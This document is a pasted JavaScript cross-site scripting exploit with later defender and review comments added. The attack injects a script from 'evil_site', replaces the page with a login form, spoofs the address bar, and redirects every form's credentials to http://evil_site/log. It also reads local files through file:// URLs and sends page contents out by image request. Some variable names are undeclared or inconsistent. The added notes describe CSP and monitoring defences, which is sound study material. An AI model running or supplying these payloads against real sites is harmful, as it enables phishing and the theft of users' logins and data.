1 | @Abdelmoughite Eljoaydi | |
2 | ||
3 | /** | |
4 | <iframe src="http://evil_site/phishing.js"></iframe> | |
5 | *This payload injects an iframe tag that will load the script located at "/phishing.js". | |
6 | *Let's take a look at what phishing.js could contain: | |
7 | */ | |
8 | ||
9 | // Function to override the HTML content. | |
// override(url): issues a synchronous GET for `url` (the third argument to
// open() is false) and, once readyState is 4 and the response body is not
// empty, assigns the response text to `document.innerHTML`. Returns nothing.
// Defender note: this code only runs if the injection described in the header
// comment succeeds, so the fix belongs at the injection point: output-encode
// user-controlled data, and restrict script and frame sources with a
// Content-Security-Policy.
10 | function override(url) { | |
11 | var xhr_req = new XMLHttpRequest(); | |
12 | xhr_req.open('GET', url, false); | |
13 | xhr_req.onreadystatechange = function () { | |
14 | if (xhr_req.readyState == 4 && xhr_req.responseText != "") { | |
15 | document.innerHTML = xhr_req.responseText; | |
16 | } | |
17 | } | |
18 | xhr_req.send(null); | |
19 | } | |
20 | ||
// The path passed to override() is relative, so the request goes to the same
// origin as the page the script is running in.
21 | //Call override(url) function to override the current page with the content of "LoginForm.jsp". | |
22 | override("/console/login/LoginForm.jsp"); // we can extend this exploitation to CSRF attacks. | |
23 | ||
// Defender note: history.pushState accepts only same-origin URLs, and the
// path used here is relative. Once script injection has occurred, the address
// bar is not evidence of which page the server actually returned.
24 | //Spoofing current URI (URL bar will look like /console/login/LoginForm.jsp). | |
25 | var stateObj = { log: "login" }; | |
26 | history.pushState(stateObj, document.getElementsByTagName("title")[0].innerHTML, "/console/login/LoginForm.jsp"); | |
27 | ||
// Defender note: the loop points the `action` of every <form> in the document
// at an external host over plain HTTP. A CSP `form-action` directive limited
// to the site's own origin blocks such submissions, and egress monitoring can
// flag form posts that leave for an unfamiliar host.
// `index` is assigned without a declaration inside this listing.
28 | //Hooking forms and submit victim credentials to "http://evil_site/log". | |
29 | var forms = document.getElementsByTagName("form"); | |
30 | for (index = 0; index < forms.length; index++) { | |
31 | void(forms[index].action = "http://evil_site/log"); | |
32 | } | |
33 | ============================================================================================================================== | |
34 | //Reading local files. (works only on Firefox) | |
35 | ||
// _LFileAccess(_method, action, argv): opens a synchronous request on `req`
// with the given method and URL, sets a form-urlencoded Content-Type header
// when the method is "POST", sends `argv` as the body and returns the
// response text.
// NOTE(review): `req` is not declared anywhere in this listing; presumably an
// XMLHttpRequest created elsewhere — confirm.
36 | function _LFileAccess(_method,action,argv){ | |
37 | ||
38 | req.open(_method,action,false); | |
39 | if(_method=="POST") | |
40 | req.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); | |
41 | req.send(argv); | |
42 | return req.responseText; | |
43 | } | |
// Requests a file:// URL (the path shown is a placeholder) through
// _LFileAccess and passes the returned text to dump().
// NOTE(review): the paste says this works only on Firefox and names no
// version; dump() is not defined in this listing — presumably the browser's
// debug-output function, confirm.
// Defender note: a page served over http(s) should never be able to read
// file:// URLs. Keep browsers patched and do not relax their local-file
// origin restrictions.
44 | var local_file=_LFileAccess("GET","file://localhost/C:/PATH/",null); | |
45 | dump(local_file); | |
46 | ||
47 | //Screen-capture of the current page state. | |
// NOTE(review): `XMlHttpReq` is not declared anywhere in this listing.
48 | XMlHttpReq.open("GET","example.com",false); | |
// getURL(s): creates an Image, sets its style width and height to 0 and
// assigns `s` to its src. The element is not appended to the document here
// and nothing is returned.
// Defender note: assigning src is enough for a browser to request the URL, so
// an image request can carry data out in its query string. A CSP `img-src`
// allow-list limits which hosts such requests can reach.
49 | function getURL(s) { | |
50 | var image = new Image(); | |
51 | image.style.width = 0; | |
52 | image.style.height = 0; | |
53 | image.src = s; | |
54 | } | |
// Appends a response text, unencoded, to the query string of an absolute
// http://example.com URL and hands it to getURL().
// NOTE(review): `xmlHttpReq` is not declared anywhere in this listing.
// Detection: unusually long or markup-bearing query strings in proxy or
// egress logs, sent to hosts the application does not normally contact.
55 | getURL("http://example.com/page.php?pagecopie="+xmlHttpReq.responseText); |